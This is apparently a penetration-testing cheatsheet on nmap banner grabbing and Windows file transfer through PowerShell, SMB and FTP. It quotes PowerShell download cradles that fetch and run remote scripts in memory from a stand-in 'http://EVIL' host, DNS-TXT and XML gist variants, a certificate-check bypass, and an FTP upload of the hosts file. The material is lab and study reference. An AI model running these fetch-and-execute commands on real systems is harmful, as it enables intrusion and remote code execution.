# Cheatsheet

## Nmap

### Running an Nmap Script

```bash
nmap --script <SCRIPT_NAME> -p<PORT> <DOMAIN/IPADDRESS>
```

## Banner Grabbing

```bash
nmap -sV --script=banner <DOMAIN/IPADDRESS>
```

```bash
netcat <IP_ADDRESS> <PORT>
```

```bash
nc -nv <IP_ADDRESS> <PORT>
```

```bash
curl -IL <DOMAIN>
```

## Windows File Transfer Methods (Download Operations)

### PowerShell Base64 Encode & Decode

> Copy a small file from a Linux machine to a Windows machine by pasting its Base64 encoding into PowerShell; the whole file travels inside one command line, so keep it small

On Linux Machine

```bash
cat <FILE> | base64 -w 0;echo
```

On Windows Machine

```powershell
[IO.File]::WriteAllBytes("C:\<LOCATION>\<FILENAME>", [Convert]::FromBase64String("<BASE64>"))
```
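Pasting by hand is where this method goes wrong: a wrapped line, a truncated clipboard or a `$` in the destination path quietly produces a different file. The Linux-side script below is an added example (not part of the original cheatsheet) that emits the decode one-liner together with a `Get-FileHash` check for the Windows side, quotes the destination as a single-quoted PowerShell literal, and warns when the payload is too long for cmd.exe. The 8000-character warning threshold is an assumption chosen from cmd.exe's 8191-character command-line limit; `sha256sum`/`shasum` and `base64` are assumed to be available.

```bash
#!/bin/sh
# Added example, not from the original page: build the PowerShell decode
# one-liner for a file plus a hash check the receiver can paste afterwards.
# Assumptions: base64 and sha256sum (or shasum) are installed; the 8000
# character threshold is chosen because cmd.exe rejects command lines
# longer than 8191 characters.

gen_b64_cradle() {
    src="$1"
    dest="$2"        # Windows path, e.g. C:\Windows\Temp\tool.exe

    # strip the newlines base64 inserts every 76 characters
    # (portable equivalent of GNU "base64 -w 0")
    b64=$(base64 "$src" | tr -d '\n')

    # hash on the sending side so the receiver can prove the paste was intact
    if command -v sha256sum >/dev/null 2>&1; then
        sum=$(sha256sum "$src" | cut -d' ' -f1)
    else
        sum=$(shasum -a 256 "$src" | cut -d' ' -f1)
    fi
    sum=$(printf '%s' "$sum" | tr 'a-f' 'A-F')   # Get-FileHash prints uppercase

    # the path goes into a single-quoted PowerShell literal so "$" and "`"
    # in it are not interpreted; a literal ' inside it must be doubled
    psdest=$(printf '%s' "$dest" | sed "s/'/''/g")

    if [ "${#b64}" -gt 8000 ]; then
        echo "warning: ${#b64}-character payload exceeds the cmd.exe line limit; paste into a PowerShell console or pick another transfer method" >&2
    fi

    # line 1: write the file; line 2: prints True on Windows if the hash matches
    printf "[IO.File]::WriteAllBytes('%s',[Convert]::FromBase64String('%s'))\n" "$psdest" "$b64"
    printf "(Get-FileHash '%s' -Algorithm SHA256).Hash -eq '%s'\n" "$psdest" "$sum"
}

# usage: sh b64cradle.sh <FILE> 'C:\<LOCATION>\<FILENAME>'
if [ "$#" -ge 2 ]; then
    gen_b64_cradle "$1" "$2"
fi
```

Paste the first output line into the Windows PowerShell session, then the second; anything other than `True` means the transfer was corrupted and the file should not be run.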

### PowerShell Web Downloads

#### PowerShell DownloadFile Method

```powershell
(New-Object Net.WebClient).DownloadFile('<URL>','C:\<LOCATION>\<FILENAME>')
```

```powershell
(New-Object Net.WebClient).DownloadFileAsync('<URL>','C:\<LOCATION>\<FILENAME>')
```

#### PowerShell DownloadString - Fileless Method

> Downloads the script and runs it in memory with `IEX` without writing it to disk

```powershell
IEX (New-Object Net.WebClient).DownloadString('<URL>')
```

```powershell
(New-Object Net.WebClient).DownloadString('<URL>') | IEX
```

#### PowerShell Invoke-WebRequest

Shorter aliases for `Invoke-WebRequest` in Windows PowerShell (PowerShell 6+ removed the `curl` and `wget` aliases, so only `iwr` is safe to rely on there)

```powershell
iwr
curl
wget
```

```powershell
Invoke-WebRequest <URL> -OutFile <FILENAME>
```

#### PowerShell Cradles

> From HarmJ0y, <https://gist.github.com/HarmJ0y/bb48307ffa663256e239>

```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#   code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select-String -Pattern '"*"') -split '"'[0]))))

# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
```

#### UseBasicParsing Error (Internet Explorer engine not available or first-launch configuration not complete)

```powershell
Invoke-WebRequest <URL> -UseBasicParsing | IEX
```

#### Could not establish trust relationship for the SSL/TLS secure channel (certificate not trusted)

Disables certificate validation for every .NET web request in the current Windows PowerShell process, so the download is no longer protected against interception; use it only for lab targets and only in the session that needs it. In PowerShell 7 the equivalent is the `-SkipCertificateCheck` switch on `Invoke-WebRequest`.

```powershell
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

### SMB Downloads

#### No Authentication

On Linux, create an SMB server that exposes `/tmp/smbshare` as `share`

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

On Windows, copy the file from the SMB server (newer Windows builds block unauthenticated guest access to SMB shares by default; if the copy fails with an error about security policies blocking guest access, use the authenticated variant below)

```powershell
copy \\<IPADDRESS>\share\<FILENAME>
```

#### With Authentication

On Linux, create SMB Server with username and password

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

On Windows, mount the SMB share with the username and password (remove the mapping afterwards with `net use n: /delete`)

```powershell
net use n: \\<IPADDRESS>\share /user:<USERNAME> <PASSWORD>
```

```powershell
copy n:\<FILENAME>
```

### FTP Downloads

#### Using pyftpdlib

On Linux, set up an FTP server (pyftpdlib serves the current directory read-only to anonymous users by default; add `--write` only if uploads are needed)

```bash
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
```

On Windows, transfer files from FTP Server using PowerShell

```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<IPADDRESS>/<FILENAME>', 'C:\<LOCATION>\<FILENAME>')
```

#### Create a Command File for the FTP Client and Download the Target File

Useful when PowerShell is restricted: the built-in `ftp.exe` reads its commands from a file with `-s:`, `-n` suppresses auto-login so `USER` can be given in the script, and `-v` suppresses the server responses. `GET` downloads the file from the server; to upload instead, replace it with `PUT <LOCALFILE>` (for example `PUT c:\windows\system32\drivers\etc\hosts`), which the server must allow.

```cmd
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo GET <FILENAME> >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> GET <FILENAME>
ftp> bye
```

## Windows File Transfer Methods (Upload Operations)
